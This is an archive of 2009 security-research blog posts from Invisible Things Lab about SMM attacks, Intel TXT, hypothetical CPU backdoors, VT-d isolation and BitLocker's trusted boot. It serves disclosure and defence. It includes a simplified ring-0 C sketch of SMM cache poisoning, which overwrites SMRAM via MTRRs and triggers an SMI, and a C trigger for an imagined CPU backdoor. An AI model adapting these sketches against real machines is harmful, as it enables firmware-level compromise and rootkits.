Finally, the nice picture of the Q35 chipset (MCH), where our rootkit lives :) The ARC4 processor is somewhere inside...

Thursday, July 30, 2009

Black Hat 2009 Slides

The wait is over. The slides are here. The press release is here. Unless you're a chipset/BIOS engineer kind of person, I strongly recommend reading the press release first, before opening the slides.

So, the "Ring -3 Rootkit" presentation is about vPro/AMT chipset compromises. The "Attacking Intel BIOS" presentation is about exploiting a heap overflow in the BIOS environment in order to bypass the reflashing protection that otherwise allows only Intel-signed updates to be flashed.

We will publish the code some time after we get back from Vegas.

Enjoy.

ps. Let me remind my dear readers that all the files hosted on the ITL website are not digitally signed and are served over a plaintext connection (HTTP). In addition, ITL's website is hosted on a 3rd-party provider's server, over which we have absolutely no control (which is the reason why we don't buy an SSL certificate for the website). Never trust unsigned files that you download from the Internet. ITL cannot be held liable for any damages caused by files downloaded from our website, unless they are digitally signed.

Friday, July 17, 2009

Interview

Alan Dang from Tom's Hardware did an interview with me. I talk there about quite a lot of things, many of which I would probably write about on this blog sooner or later (or already had), so I thought it might be of interest to the readers of this blog.

Friday, June 12, 2009

Virtualization (In)Security Training in Vegas

VM escapes, hypervisor compromises (via "classic" rootkits, as well as Bluepill-like rootkits), hypervisor protection strategies, SMM attacks, TXT bypassing, and more — these are some of the topics that will be covered by our brand new training on Virtualization (In)Security at the upcoming Black Hat USA.

The training offers quite a unique chance, I think, to absorb the results of 1+ year of research done by our team within... just 2 days. This will be provided via detailed lectures and unique hands-on exercises.

Unlike our previous training on stealth malware (which will also be offered this year, BTW), this time we will offer attendees a bit of hope :) We will be stressing that some of the new hardware technologies (Intel TXT, VT, TPM), if used properly, have the potential to dramatically increase the security of our computer systems. Sure, we will be showing attacks against those technologies (e.g. TXT), but nevertheless we will be stressing that this is the proper way to go in the long run.

Interestingly, I'm not aware of any similar training that covers the security issues related to virtualization systems and bare-metal hypervisors. I hope we will not get into trouble with the Antitrust Commission for monopolizing this field ;)

The training brochure (something for your boss) is here.

The detailed agenda spanning 2 full days can be downloaded here.

The Black Hat signup page is here.

Tuesday, June 09, 2009

Quest to The Core

If you think SMM rootkits or PCI backdoors are low-level, then you should certainly see our talks in Vegas — ITL is going to define what the "low-level" adjective really means at the end of the decade ;)

In case you haven't noticed it on the Black Hat website yet — Alex and Rafal will be giving two presentations in Vegas:

1) Introducing Ring -3 Rootkits (description)

2) Attacking Intel® BIOS (description)

Let me stress that we have been in touch with Intel for quite some time about the above attacks, and that Intel is planning to release appropriate fixes a few weeks before our presentations at Black Hat.

There is more than just this coming at this year's Black Hat — most notably, we will also be debuting our Virtualization (In)Security Training. I will write a separate post about this training (containing a detailed agenda) in the coming days, so stay tuned.

Quite exciting.

Tuesday, June 02, 2009

More Thoughts on CPU backdoors

I've recently exchanged a few emails with Loic Duflot about CPU-based backdoors. It turned out that he recently wrote a paper about hypothetical CPU backdoors and also implemented some proof-of-concept ones using QEMU (for he doesn't happen to own a private CPU production line). The paper can be bought here. (Loic is an academic, and so he must follow some of the strange customs of the academic world, one of them being that papers are not freely published, but rather sold on a publisher's website… Heck, even we, the ultimately commercialized researchers, still publish our papers and code for free.)

Let me stress that what Loic writes about in the paper are only hypothetical backdoors, i.e. no actual backdoors have been found in any real CPU (ever, AFAIK!). What he does is consider how Intel or AMD could implement a backdoor, and then simulate this process by implementing those backdoors inside QEMU.

Loic also focuses on local privilege escalation backdoors only. You should not, however, underestimate a good local privilege escalation — such a thing could be used to break out of any virtual machine, like VMWare, or potentially even out of a software VM like e.g. the Java VM.

The backdoors Loic considers are somewhat similar in principle to the simple pseudo-code one-liner backdoor I used in my previous post about hardware backdoors, only more complicated in the actual implementation, as he took care of a few important details that I naturally didn't concern myself with. (BTW, the main message of my previous post was how cool a technology VT-d is, being able to prevent PCI-based backdoors, and not how doomed we are because of potential Intel- or AMD-induced backdoors.)

Some people believe that processor backdoors do not exist in reality, because if they did, the competing CPU makers would be able to find them in each other's products, and would later likely cause a "leak" to the public about such backdoors (think: black PR). Here people make the assumption that AMD or Intel is technically capable of reversing each other's processors, which seems to be a natural consequence of them being able to produce them.

I don't think I fully agree with such an assumption though. Just the fact that you are capable of designing and producing a CPU doesn't mean you can also reverse engineer one. Just the fact that Adobe can write a few-hundred-megabyte application doesn't mean they are automatically capable of reverse engineering similar applications of that size. Even if we assumed that it is technically feasible to use an electron microscope to scan and map all the electronic elements of the processor, there is still the problem of interpreting how all those hundreds of millions of transistors actually work.

Anyway, here are a few more thoughts about the properties of hypothetical backdoors that Intel or AMD might use (or be using).

First, I think that in such a backdoor scenario everything besides the "trigger" would be encrypted. The trigger is something that you must execute first in order to activate the backdoor (e.g. the CMP instruction with particular, i.e. magic, values in some registers, say EAX, EBX, ECX, EDX). Only then does the backdoor get activated and e.g. the processor auto-magically escalates into Ring 0. Loic considers this in more detail in his paper. So, my point is that all the attacker's code that executes afterwards (think of it as a shellcode for the backdoor, specific to the OS) is fetched by the processor in an encrypted form and decrypted only internally, inside the CPU. That should be trivial to implement, while at the same time it should complicate any potential forensic analysis afterwards — it would be highly non-trivial to understand what the backdoor actually did.

Another crucial thing for a processor backdoor, I think, should be some sort of anti-replay protection. Normally, if a smart admin had been recording all the network traffic, and also all the executables that ever got executed on the host, chances are that he or she would catch the triggering code and the shellcode (which might be encrypted, but still). So, no matter how subtle the trigger is, it is still quite possible that a curious admin will eventually find out that some tetris.exe somehow managed to break out of a hardware VM and did something strange, e.g. installed a rootkit in the hypervisor (or that some Java code somehow was able to send out all the DOCX files from our home directory).

Eventually the curious admin would find the strange CPU instruction (the trigger) after which all the strange things happened. Now, if the admin was able to take this code, replicate it, and post it to Daily Dave, then, assuming his message passed through the moderator (Hi Dave), he would effectively compromise the processor vendor's reputation.

An anti-replay mechanism could ideally be some sort of challenge-response protocol used in the trigger. So, instead of always having to put 0xdeadbeef, 0xbabecafe, and 0x41414141 into EAX, EBX and EDX and execute some magic instruction (say CMP), you would have to put in a magic value that is the result of some crypto operation taking the current date and a magic key as input:

Magic = MAGIC (Date, IntelSecretKey).

The obvious problem is how the processor can obtain the current date. It would have to talk to the southbridge at best, which is 1) non-trivial, 2) observable on the bus, and 3) spoofable.

A much better idea would be to equip the processor with some sort of eeprom memory, big enough to hold, say, one 64-bit or maybe 128-bit value. Each processor would get a different value flashed there when leaving the factory. Now, in order to trigger the backdoor, the processor vendor (or the backdoor operator, think: NSA) would have to do the following:

1) First, execute some code that would read this unique value stored in the eeprom of the particular target processor and send it back to them,

2) Now, they could generate the actual magic for the trigger:

Magic = MAGIC (UniqueValueInEeprom, IntelSecretKey)

3) ...and send the actual code to execute the backdoor and shellcode, with the correct trigger embedded, based on the magic value.

Now, the point is that the processor would automatically increment the unique number stored in the eeprom, so the same backdoor-exploiting code would not work twice on the same processor (while at the same time it would be easy for the NSA to send another exploit, as they know what the next value in the eeprom should be). Also, such a customized exploit would not work on any other CPU, as the assumption was that each CPU gets a different value at the factory, so again it would not be possible to replicate the attack and prove that the particular code ever did something wrong.
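Sketched in Python, the whole challenge-response scheme could look something like this (the key, the counter width and the MAGIC construction are of course made up for illustration):

import hmac, hashlib

INTEL_SECRET_KEY = b"known-only-to-the-vendor-or-NSA"   # hypothetical

def MAGIC(eeprom_value, key=INTEL_SECRET_KEY):
    # Derive a fresh 128-bit trigger value from the per-CPU counter.
    challenge = eeprom_value.to_bytes(8, "little")
    return hmac.new(key, challenge, hashlib.sha256).digest()[:16]

# Operator side: step 1 reads the counter back from the target CPU,
# step 2 derives the magic, step 3 embeds it in the exploit.
eeprom_value = 0x1337                 # value read from the target's eeprom
trigger = MAGIC(eeprom_value)

# CPU side: recompute the expected value, compare with what the code
# supplied, then increment the counter so the same exploit never works twice.
assert trigger == MAGIC(eeprom_value)
eeprom_value += 1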

So, the moment I learn that processors have built-in eeprom memory, I will start thinking seriously there are backdoors out there :)

One thing that bothers me about all these divagations about hypothetical backdoors in processors is that I find them pretty useless at the end of the day. After all, by talking about those backdoors and how they might be created, we do not make it any easier to protect against them, as there simply is no possible defense here. Nor does this make it any easier for us to build such backdoors (if we wanted to become the bad guys for a change). It might only be of interest to Intel or AMD, or whatever other processor maker, but I somewhat feel they have already spent much more time thinking about it, and chances are they can only laugh at what we are saying here, seeing how unsophisticated our proposed backdoors are. So, my Dear Reader, I think you've just been wasting time reading this post ;) Sorry for tricking you into it, and I hope to write something more practical next time :)

Thursday, May 28, 2009

Thoughts About Trusted Computing

Here are the slides about Trusted Computing I used for my presentations at the EuSecWest today, and at the Confidence conference last week.

As this was supposed to be a keynote, the slides are much less technical than our other slides, and also there are no new attacks presented there. Still, I hope they might be useful as some sort of "alternative" introduction to Trusted Computing :)

A cool presentation I saw today was about PCI-based backdoors, by Christophe Devine and Guillaume Vissian. They basically took a general-purpose, FPGA-programmable PC Card (AKA PCMCIA) and flashed it with an FPGA "program" that implemented a simple state machine. The purpose of the state machine was to wait until its DMA engine got initialized and then modify certain bytes in host memory that happened to be part of the winlogon.exe process (IIRC they changed XOR AL, AL into MOV AL, 1, or something like that, at the end of some password verification function inside winlogon.exe). The slides should be available soon on the conference website. I also hope they will publish all the source code needed to flash your own personal "winlogon unlocker".

The live demo was really impressive — they showed a winlogon screen, tried to log in a few times with wrong passwords, of course all the attempts failed, then they inserted their magic, $300-worth PC Card, and… 2 seconds later they could log in using any password they wanted.

While not necessarily a breakthrough, as everybody has known for years that such things could be done, I think it is still important that somebody eventually implemented it, discussed the technical details (FPGA-related), and also showed how to do it with cheap, generic, reflashable hardware without using a soldering iron.

Of course, I also discussed in my presentation how to prevent PCI-based backdoors (like the one discussed here) using VT-d, but this defense is currently only available if you use Xen 3.3 or later, and it also requires that you manually create driver domain partitions and come up with a reasonable scheme for assigning devices to driver domains. All in all, 99.9% of users are not (and will not be anytime soon) protected against such attacks. Oh, wait, there is actually a relatively simple software-based workaround (besides putting glue into your PC Card slot, which is not a very subtle one)… I wonder who else will find out :)

Wednesday, March 25, 2009

Trusting Hardware

So, you're a decent paranoid person, running only open source software on your box: Linux, GNU, etc. You have the feeling you could, if you only wanted to, review every single line of code (of course you will probably never do this, but anyway). You might be even more paranoid and also try running an open source BIOS. You feel satisfied and cannot understand all those stupid people running closed source systems like e.g. Windows. Right?

But here's where you are stuck — you still must trust your hardware. Trust that your hardware vendor has not, e.g., built a backdoor into your network card's microcontroller…

So, if we buy a laptop from vendor X, which might be based in some not-fully-democratic country, how do we know they didn't put backdoors there? And not only to spy on Americans, but also to spy on their own citizens? When was the last time you reverse-engineered all the PCI devices on your motherboard?

Scared? Good!

Enter the game-changer: the IOMMU (known as VT-d on Intel platforms). With proper OS/VMM design, this technology can address the very problem of most hardware backdoors. A good example of a practical system that allows for this is Xen 3.3, which supports VT-d and allows you to move drivers into separate, unprivileged driver domain(s). This way each PCI device can be limited to DMA only into the memory region occupied by its own driver.
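For the record, with Xen this boils down to hiding the device from dom0 (e.g. via the pciback driver) and assigning it to an unprivileged domain that runs nothing but the driver. A rough xm-style config fragment could look like the following (the device address, kernel and file names are made-up examples):

# /etc/xen/net-driver-domain.cfg -- unprivileged domain that owns only the NIC
kernel  = "/boot/vmlinuz-2.6.18-xen"
ramdisk = "/boot/initrd-netdrv.img"
memory  = 128
name    = "net-driver-domain"
# The NIC must first be hidden from dom0 (e.g. pciback.hide=(02:00.0) on the
# dom0 kernel command line); VT-d then confines its DMA to this domain only.
pci     = [ '02:00.0' ]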

The network card's microcontroller can still compromise the network card driver, but nothing else. Assuming we are using only encrypted communication, there is not much an attacker can gain by compromising this network card driver, besides doing a DoS. Similarly for the disk driver — if we use full disk encryption (which is a good idea anyway), there is not much an attacker can gain from compromising the low-level disk driver.

Obviously the design of such a system (especially one used for desktop computing) is not trivial and needs to be thoroughly thought out. But it is possible today(!), thanks to those new virtualization technologies.

It seems, then, that we could protect ourselves against potentially malicious hardware. With one exception however… we still need to trust the CPU and also the memory controller (AKA northbridge AKA chipset), which implements the IOMMU.

On AMD systems, the memory controller has long been integrated into the processor. Also Intel's recent Nehalem processors integrate the memory controller on the same die.

This all means we need to trust only one vendor (Intel or AMD) and only one component, i.e. The Processor. But should we blindly trust them? After all, it would be trivial for Intel or AMD to build a backdoor into their processors. Even something as simple as:

if (rax == MAGIC_1 && rcx == MAGIC_2) jmp [rbx]

Just a few more gates in the CPU, I guess (there are apparently already about 780 million gates on Core i7, so a few more should not make much difference), and no performance penalty. Exploitable remotely against most systems and against pretty much any non-trivial program. Yet totally undetectable by anybody without an electron microscope (and tons of skill and knowledge).
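
To make the "trivially reachable" part concrete, here is a purely hypothetical C sketch of how an ordinary ring-3 process could pull the trigger of such a backdoor, if it existed. The magic constants are made up, and on any real CPU this code does precisely nothing — the point is only that nothing more than loading three registers would be required, no syscall, no special privilege.

#include <stdint.h>

#define MAGIC_1 0xdeadbeefcafebabeULL   /* made-up value */
#define MAGIC_2 0x0123456789abcdefULL   /* made-up value */

static void payload(void)
{
    /* On a hypothetically backdoored CPU, this would now run with
     * whatever privileges the imagined extra gates grant it. */
}

int main(void)
{
    /* Load the "magic" values into rax/rcx and the jump target into rbx. */
    __asm__ volatile (
        "mov %0, %%rax\n\t"
        "mov %1, %%rcx\n\t"
        "mov %2, %%rbx\n\t"
        :
        : "r" (MAGIC_1), "r" (MAGIC_2), "r" ((uint64_t)(uintptr_t)&payload)
        : "rax", "rcx", "rbx");
    return 0;
}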

And this is just the simplest example that came to mind within a few minutes. I'm sure one could come up with something even more universal and reliable. The fact is — if you are the CPU vendor, it is trivial for you to build in an effective backdoor.

It's funny how various people, e.g. European government institutions, are afraid of using closed source software, e.g. Windows, for fear of Microsoft putting backdoors in there. Yet they are not concerned about using processors made by some other US companies. It is significantly more risky for Microsoft to put a backdoor into its software, where even a skilled teenager equipped with IDA Pro could find it, than it is for Intel or AMD, where effectively nobody can find it.

So, I wonder whether various government and large corporate customers from outside the US will start asking Intel and AMD to provide them with the exact blueprints of their processors. After all they already require Microsoft to provide them with the source code under an NDA, right? So, why not the "source code" for the processor?

Unfortunately there is nothing to stop a processor vendor from providing its customers with blueprints different from those actually used to "burn" the processors. So an additional requirement would be needed: that they also allow their manufacturing process to be audited. Another solution would be to hire a group of independent researchers, equip them with an electron microscope, and let them reverse engineer some randomly chosen processors… Hmmm, I even know a team that would love to do that ;)

A quick summary in case you get lost already:
  1. On most systems we are not protected against hardware backdoors, e.g. in the network card controller.
  2. New technologies, e.g. Intel VT-d, can help protect against potentially malicious hardware (this requires a specially designed OS, e.g. specially configured Xen)…
  3. … except for the potential backdoors in the processor.
  4. If we don't trust Microsoft, why should we trust Intel or AMD?
BTW, in May I will be speaking at the Confidence conference in Krakow, Poland. This is gonna be a keynote, so don't expect new attacks to be revealed, but rather some more philosophical stuff about trusted computing (why it is not evil) and problems like the one discussed today. See you there!

Friday, March 20, 2009

The Sky Is Falling?

A few reporters have asked me whether our recent paper on attacking SMM via CPU cache poisoning means the sky is really falling now.

Interestingly, not many people seem to have noticed that this is the 3rd attack against SMM our team has found in the last 10 months. OMG :o

But anyway, does the fact that we can easily compromise SMM today, and write SMM-based malware, mean the sky is falling for the average computer user?

No! The sky actually fell many years ago… Default users with admin privileges, monolithic kernels everywhere, most software unsigned and downloadable over plaintext HTTP — these are the main reasons we cannot trust our systems today. Add to that the pathetic attempts to fix it, e.g. restricting admin users on Vista while still requiring full admin rights to install any piece of stupid software, or selling people the illusion of security via A/V programs that cannot even protect themselves properly…

It's also funny how so many people focus on solving the security problem with "Security by Correctness" or "Security by Obscurity" approaches — patches, patches, NX and ASLR — all good, but they are not gonna work as an ultimate protection (if they could, they would have worked out already).

On the other hand, there are some emerging technologies out there that could allow us to implement an effective "Security by Isolation" approach: technologies such as VT-x/AMD-V, VT-d/IOMMU, or Intel TXT and TPM.

So we, at ITL, focus on analyzing those new technologies, even though almost nobody uses them today, because those technologies could actually make a difference. Unlike A/V programs or Patch Tuesdays, they can dramatically change the level of sophistication required of the attacker.

The attacks we focus on are important for those new technologies — e.g. today Intel TXT is pretty much useless without protection from SMM attacks. And currently there is no such protection, which sucks. SMM rootkits sound sexy, but, frankly, the bad guys are doing just fine using traditional kernel mode malware (due to the fact that A/V is not effective). Of course, SMM rootkits are just yet another annoyance for the traditional A/V programs, which is good, but they might not be the most important consequence of SMM attacks.

So, should the average Joe Dow care about our SMM attacks? Absolutely not!

Thursday, March 19, 2009

Attacking SMM Memory via Intel® CPU Cache Poisoning

As promised, the paper and the proof-of-concept code have just been posted on the ITL website here.

A quote from the paper:
In this paper we have described practical exploitation of the CPU cache poisoning in order to read or write into (otherwise protected) SMRAM memory. We have implemented two working exploits: one for dumping the content of SMRAM and the other one for arbitrary code execution in SMRAM. This is the third attack on SMM memory our team has found within the last 10 months, affecting Intel-based systems. It seems that current state of firmware security, even in case of such reputable vendors as Intel, is quite unsatisfying.

The potential consequence of attacks on SMM might include SMM rootkits [9], hypervisor compromises [8], or OS kernel protection bypassing [2].
Don't worry, the shellcode we use in the exploit is totally harmless (I really have no idea how some people concluded we were going to release an SMM rootkit today) — it only increments an internal counter on every SMI and jumps back to the original handler. If you want something fancier, AKA SMM rootkits, you might want to re-read Sherri and Shawn's Black Hat paper from last year and try writing something they describe there.

The attack presented in the paper has been fixed on some systems, according to Intel. We have, however, found that even relatively new boards, e.g. the Intel DQ35, are still vulnerable (the very recent Intel DQ45 doesn't seem to be vulnerable, though). The attached exploit is for the DQ35 board — the offsets would have to be changed for it to work on other boards (please do not ask how to do this).
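
For readers who won't make it through the whole paper, here is a rough, hedged C sketch of the general cache-poisoning idea it describes. It assumes ring-0 execution with SMRAM identity-mapped; the MSR numbers are the standard architectural MTRR ones, but the SMRAM base/size are just the legacy defaults, the mask assumes 36-bit physical addressing, and the whole thing is a simplification that will not work as-is on any particular board.

#include <stdint.h>

#define IA32_MTRR_PHYSBASE0 0x200
#define IA32_MTRR_PHYSMASK0 0x201
#define MTRR_TYPE_WB        0x06ULL
#define SMRAM_BASE          0xA0000ULL   /* legacy SMRAM window, illustrative only */
#define SMRAM_SIZE          0x20000ULL   /* 128 KB */

static inline void wrmsr(uint32_t msr, uint64_t val)
{
    __asm__ volatile ("wrmsr" : : "c" (msr),
                      "a" ((uint32_t)val), "d" ((uint32_t)(val >> 32)));
}

static inline void outb(uint16_t port, uint8_t val)
{
    __asm__ volatile ("outb %0, %1" : : "a" (val), "Nd" (port));
}

void poison_smram(const uint8_t *payload, uint64_t len)
{
    /* 1. Use a variable-range MTRR to mark the SMRAM range as Write-Back. */
    wrmsr(IA32_MTRR_PHYSBASE0, SMRAM_BASE | MTRR_TYPE_WB);
    wrmsr(IA32_MTRR_PHYSMASK0,
          (~(SMRAM_SIZE - 1) & 0xFFFFFFFFFULL) | (1ULL << 11)); /* bit 11 = valid */

    /* 2. Write the payload over the SMI entry point: with WB caching the
     *    writes land in the CPU cache, not in the still-locked DRAM copy of SMRAM. */
    volatile uint8_t *smram = (volatile uint8_t *)(uintptr_t)SMRAM_BASE;
    for (uint64_t i = 0; i < len; i++)
        smram[i] = payload[i];

    /* 3. Trigger an SMI (e.g. via the APM command port); the CPU then fetches
     *    the SMI handler from the poisoned cache lines. */
    outb(0xB2, 0x00);
}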

Keep in mind this is a different SMM attack than the one we mentioned during last month's Black Hat presentation on TXT bypassing (VU#127284). We are planning to present that other attack at the upcoming Black Hat Vegas. Hopefully this will not be the only thing that ITL will entertain you with in Vegas — Alex and Rafal are already working on something even cooler (and even lower level) for the show, so cross your fingers!

And good luck to Loic with his presentation that is about to start just now...

Friday, March 13, 2009

Independent Attack Discoveries

Next Thursday, March 19th, at 1600 UTC, we will publish a paper (+ exploits) on exploiting Intel® CPU cache mechanisms.

The attack allows for privilege escalation from Ring 0 to the SMM on many recent motherboards with Intel CPUs. Interestingly, the very same attack will be presented by another researcher, Loic Duflot, at the CanSecWest conference in Vancouver, Canada, on... Thursday 19th, 1600 UTC. BTW, this is a different SMM-targeting attack than the one we mentioned during our recent TXT talk and that is scheduled to be presented later this year.

Here's the full story (there is also a moral at the end) …

Just after our presentation at Black Hat last month, Rafal and I were independently approached by some person (or two different persons — we haven't actually figured that out; there were some 30 people asking us questions after the talk, so it's hard to remember all the faces) who was very curious about our SMM attacks (whose details we hadn't discussed, of course, because Intel is still working on a fix). This person(s) started asking various questions about the attacks, and one of the questions, asked of both me and Rafal, was whether the attack used caching. Later that day, during a private ITL dinner, one of us brought this up, and we started wondering whether it was indeed possible to perform an SMM attack via CPU caching. By the end of the dinner we had sketched out the attack, and later, when we got back to Poland, Rafal implemented a working exploit with code execution in SMM in a matter of just a few hours. (I think I used way too many parentheses in this paragraph.)

So, being the good and responsible guys that we are, we immediately reported the new bug to Intel (talking to Intel's PSIRT is actually becoming quite routine for us in recent months ;). And this is how we learnt that Loic had come up with the same attack (back then there was no talk description on the conference website) — apparently he approached Intel about it back in October 2008, so 3-4 months before us — and also that he was planning to present it at the CanSecWest conference in March. So, we contacted Loic and agreed to do a coordinated disclosure next Thursday.

Interestingly, however, none of us was even close to being the first discoverer of the underlying problem that our attacks exploit. In fact, the possibility of using caching to compromise SMM was discussed in certain documents authored as early as the end of 2005 (!) by nobody else than... Intel's own employees. Stay tuned for the details in our upcoming paper.

Conclusion

If there is a bug somewhere and it stays unpatched for long enough, it is almost guaranteed that various people will (re)discover and exploit it, sooner or later. So don't blame researchers for finding and publishing information about bugs — they actually do society a favor. Remember the guy who asked us whether our attack used caching? I bet he (or his associates) also had exploits for this caching bug, but apparently didn't notify the vendor. Hmm, what might they have been doing with the exploit? When was the last time you scanned your system for SMM rootkits? ;)

Anyways, congrats to Loic for being the first to write exploits for this bug. Also congrats to the Intel employees who originally noticed the problem back in 2005.

Thursday, February 19, 2009

Attacking Intel TXT: paper and slides

The new press release covering the basic details about our TXT attack is here.

The paper is here.

The slides, converted to PDF format, are here. There is also the original version of the slides in Keynote format here for the Mac people. And for all the other people who don't use a Mac but still value aesthetics (?!), I have also generated a clickable QuickTime movie out of the Keynote slides; it can be found here, but it weighs 80MB.

Enjoy.

Tuesday, February 10, 2009

Nesting VMMs, Reloaded.

Besides breaking Intel's stuff, we have also been doing other things over at our lab. I thought I would share this cool screenshot of Virtual PC running inside Xen. More precisely, what you see in the pic is: Windows XP running inside Virtual PC, which runs inside Vista, which itself runs inside a Xen HVM VM. Both Virtual PC and Xen are using Intel's hardware virtualization (VT-x is always used for HVM guests on Xen).

Our Nested Xen patch is part of work done for a customer, so it is not going to be published. Besides, it is currently a bit unstable ;) It's just a prototype that shows such a thing can be done.

Monday, January 26, 2009

Closed Source Conspiracy

Many people in the industry have an innate fear of closed source (AKA proprietary) software, which especially applies to everything crypto-related.

The usual argument goes this way: proprietary crypto software is bad, because the vendor might have put some backdoors in there. And: only open source crypto software, which can be reviewed by anyone, can be trusted! So, after my recent post, quite a few people wrote to me asking how I could defend such an evil thing as BitLocker, which is proprietary and, even worse, comes from Microsoft.

I personally think this way of reasoning sucks. In the majority of cases, the fact that something is distributed without the accompanying source code does not prevent others from analyzing the code. We do have advanced disassemblers and debuggers, and it is really not as difficult to make use of them as many people think.

Of course, some heavily obfuscated programs can be extremely difficult to analyze. Also, analyzing a chipset's firmware, when you do not even know the underlying CPU architecture or the I/O map, might be hard. But these are special cases and do not apply to the majority of software, which usually is not obfuscated at all.

It seems like the Backdoored Proprietary Software argument usually comes from the open-source people, who are used to unlimited access to the source code and consequently do not usually have much experience with advanced reverse engineering techniques, simply because they do not need them in their happy "Open Source Life". It's all Darwinism, after all ;)

On the other hand, some things are hard to analyze, regardless of whether the source code is available or not, think: crypto. Also, how many of you who actively use open source crypto software, e.g. TrueCrypt or GnuPG, have actually reviewed the source code? Anyone?

You might be thinking — maybe I haven't looked at the source code myself, but because it is open source, zillions of other users already have reviewed it. And if there was some backdoor in there, they would undoubtedly have found it already! Well, for all those open source fetishists, who blindly negate the value of anything that is not open source, I have only one word to say: Debian.

Keep in mind: I am not saying closed source is more secure than open source — I only resist the open-source fundamentalism that defines all proprietary software as inherently insecure, and everything open source as ultimately secure.

So, how should one (e.g. a government institution) verify the security level of a given piece of crypto software, e.g. to ensure there are no built-in backdoors? I personally doubt it could be performed by one team, as it usually happens that the same people who might be exceptionally skilled in code review, system-level security, etc. are at the same time only average cryptographers, and vice versa.

Imagine, e.g., that you need to find out whether there are any weaknesses in your system drive encryption software, something like BitLocker. Even if you get access to the source code, you would still have to analyze a lot of system-level details — how the trusted boot is implemented (SRTM? DRTM? TPM interaction?), which system software is trusted, how the implementation withstands various non-crypto-related attacks (e.g. some of the attacks I described in my previous post), etc…

But all of this is just system-level evaluation. What should come later is analysis of the actual crypto algorithms and protocols. Those later tasks fall into the cryptography field rather than the system-level security discipline, and consequently should be performed by another team: the crypto experts.

So, no doubt, it is not an easy task, and whether or not the C/C++ source code is available is usually one of the minor headaches (a good example is our attack on TXT, where we were able to discover bugs in specific Intel system software, which, of course, is not open source).

Wednesday, January 21, 2009

Why do I miss Microsoft BitLocker?

In the previous post I wrote that the one thing I really miss after switching from Vista to Mac is BitLocker Drive Encryption. I thought it might be interesting for others to understand my position, so below I describe why I think BitLocker is so cool, and why I think other system disk encryption software sucks.

So, it's all about the Trusted Boot. BitLocker does make use of a trusted boot process, while all the other system encryption software I'm aware of does not. But why is the trusted boot feature so useful? Let's start with a quick digression about what the trusted boot process is…

Trusted boot can be implemented using either a Static Root of Trust or a Dynamic Root of Trust.

The Static Root of Trust approach (also known as Static Root of Trust Measurement or SRTM) is pretty straightforward — the system starts booting from some immutable piece of firmware code that we assume is always trusted (hence the static root), and that code initiates the measurement process, in which each component measures the next one in a chain. So, e.g., this immutable piece of firmware will first calculate the hash of the BIOS and extend a TPM PCR register with the value of this hash. Then the BIOS does the same with the PCI EEPROMs and the MBR, before handing execution to them. Then the bootloader measures the OS loader before executing it. And so on.
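
In rough pseudo-C, the core of that measurement chain is just the TPM extend operation: the new PCR value is the SHA-1 of the old value concatenated with the hash of the measured component. This is only an illustrative sketch — the sha1() helper is assumed to come from some crypto library, and which component lands in which PCR is platform-specific.

#include <stdint.h>
#include <string.h>

#define PCR_SIZE 20  /* SHA-1 digest size, as used by TPM 1.2 */

/* Assumed helper, provided by a crypto library of your choice. */
void sha1(const void *data, size_t len, uint8_t digest[PCR_SIZE]);

/* TPM 1.2 extend semantics: PCR_new = SHA1(PCR_old || measurement). */
void pcr_extend(uint8_t pcr[PCR_SIZE], const uint8_t measurement[PCR_SIZE])
{
    uint8_t buf[2 * PCR_SIZE];
    memcpy(buf, pcr, PCR_SIZE);
    memcpy(buf + PCR_SIZE, measurement, PCR_SIZE);
    sha1(buf, sizeof(buf), pcr);
}

/* Conceptually, the SRTM chain then looks like:
 *   sha1(bios_image, bios_len, m);  pcr_extend(pcr0, m);  // done by the immutable root
 *   sha1(mbr, 512, m);              pcr_extend(pcr4, m);  // done by the BIOS
 *   ... each stage measuring the next one before passing control to it. */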

An alternative method of implementing trusted boot is to use a Dynamic Root of Trust (often called Dynamic Root of Trust Measurement or DRTM). Intel's TXT technology, formerly LaGrande, is an example of a DRTM (more precisely: TXT is more than just DRTM, but DRTM is the central concept on which TXT is built). We will be talking a lot about TXT next month at Black Hat in DC :) This will include a discussion of why DRTM might sometimes be preferred over SRTM and, of course, what the challenges with both are.

Essentially, both SRTM and DRTM, in the context of a trusted boot, are supposed to provide the same thing: assurance that the system that has just booted is actually the system we wanted to boot (i.e. the trusted one) and not some modified system (e.g. one compromised by an MBR virus).

BitLocker uses the Static Root of Trust Measurement. SRTM really makes sense when we combine it with either the TPM sealing or attestation feature. BitLocker uses the former to make sure that only the trusted system can get access to the disk decryption key. In other words: BitLocker relies on the TPM to unseal (release) the decryption key (needed to decrypt the system partition) when and only when the state of the chosen PCR registers is the same as it was when the decryption key was sealed into the TPM.
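
Very much simplified (the real TPM_Seal/TPM_Unseal commands involve authorization sessions, a composite hash over the selected PCRs, and encryption under a TPM-resident key that never leaves the chip), the gating logic the TPM enforces can be sketched like this; all the structures and names below are illustrative, not an actual TPM interface:

#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define PCR_SIZE 20
#define NUM_PCRS 24
#define KEY_SIZE 32

/* Toy model of a sealed blob: it records the PCR values in effect at seal
 * time. In a real TPM the key is stored encrypted, never in the clear. */
struct sealed_blob {
    uint8_t pcr_at_seal[NUM_PCRS][PCR_SIZE];
    uint8_t key[KEY_SIZE];
};

bool tpm_unseal(const struct sealed_blob *blob,
                const uint8_t current_pcr[NUM_PCRS][PCR_SIZE],
                const int *pcr_selection, int num_selected,
                uint8_t key_out[KEY_SIZE])
{
    for (int i = 0; i < num_selected; i++) {
        int p = pcr_selection[i];
        /* Any change in the measured boot chain (evil MBR, reflashed BIOS...)
         * changes the PCR value, so the comparison fails and no key comes out. */
        if (memcmp(blob->pcr_at_seal[p], current_pcr[p], PCR_SIZE) != 0)
            return false;
    }
    memcpy(key_out, blob->key, KEY_SIZE);
    return true;
}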

Ok, why is this trusted boot process so important for the system disk encryption software? Because it protects against a simple two-stage attack:
  1. You leave your laptop (it can even be fully powered down) in a hotel room and go down for breakfast… Meanwhile an Evil Maid enters your room. She holds an Evil USB stick in her hand, plugs it into your laptop, and presses the power button. The system starts and boots from the USB. An Evil version of something similar to our BluePillBoot gets installed into the MBR (or into a PCI EEPROM). This Evil Program has only one task — to sniff out the encryption software's password/PIN and then report it back to the maid the next time she comes...
  2. So, you come back to your room to brush your teeth after breakfast. Obviously you cannot refrain from turning on your laptop for a while. You just need to enter your disk encryption passphrase/PIN/whatever. Your encryption software happily displays the prompt, as if nothing had happened. After all, how could it possibly know that an Evil Program, like BluePillBoot, was loaded a moment ago from the MBR or a PCI EEPROM? It cannot! So, you enter the valid password, your system gets the decryption key, and you can get access to your encrypted system...
